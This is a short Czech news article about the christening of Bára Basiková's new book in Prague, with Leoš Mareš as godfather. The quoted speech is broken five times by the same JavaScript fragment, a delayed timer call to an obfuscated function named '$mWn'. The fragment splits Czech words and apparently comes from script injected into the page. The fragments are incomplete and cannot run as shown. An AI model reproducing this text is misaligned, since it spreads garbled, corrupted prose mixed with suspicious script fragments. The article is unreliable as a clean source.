14. 12. 2021
News

Navrhuji říct velmi originální větu: Křtím tě! Leoš Mareš kmotrem knížky Když skočíš, já taky…

Několik desítek lidí bylo svědky křtu nové knihy Báry Basikové. Do Cathedral Café Lounge & Restaurant v centru Prahy přišli zpěvaččini přátelé a pozvaní novináři. Proč si Bára vybrala za kmotra právě Leoše Mareše?

„Já jsem před lety napsala svůj první román, který tehdry křtil Bohumil Hrabal. Druhou knihu, kteroá byla o mně, křtil Michal Viewegh. Tak jsem si říkala, že bych chtěla, aby tuto knihu pokřtil nějaký zajímavý muž, někdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do, koho si vážím, někdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do je úspěšný, orignální, charsmatický, osobitý, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do má prostě šmrnc.“ uvedla umělkyně a přidala dvě historky ze setkání se slavným moderátorem.

Mám ráda lidi, kteří jsou profesinonálové, dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobře dělají svou práci, jsou slušní, úspěšní, dávají peníze na charitu, chovají se naprosto nrmálně přes to všechno, jaké velké osobnosti to jsou. A Leoš takový je. A nejenže to je úžasný muž, po kterém touží mnoho mých kamarádek, ale je to teda především skvělý tatínek a úžasný manžel.

Kromě Leoše Mareše byly kmotrami také Radka a Emma Folprechtovy, které se podílely na obálce a grafice knížky.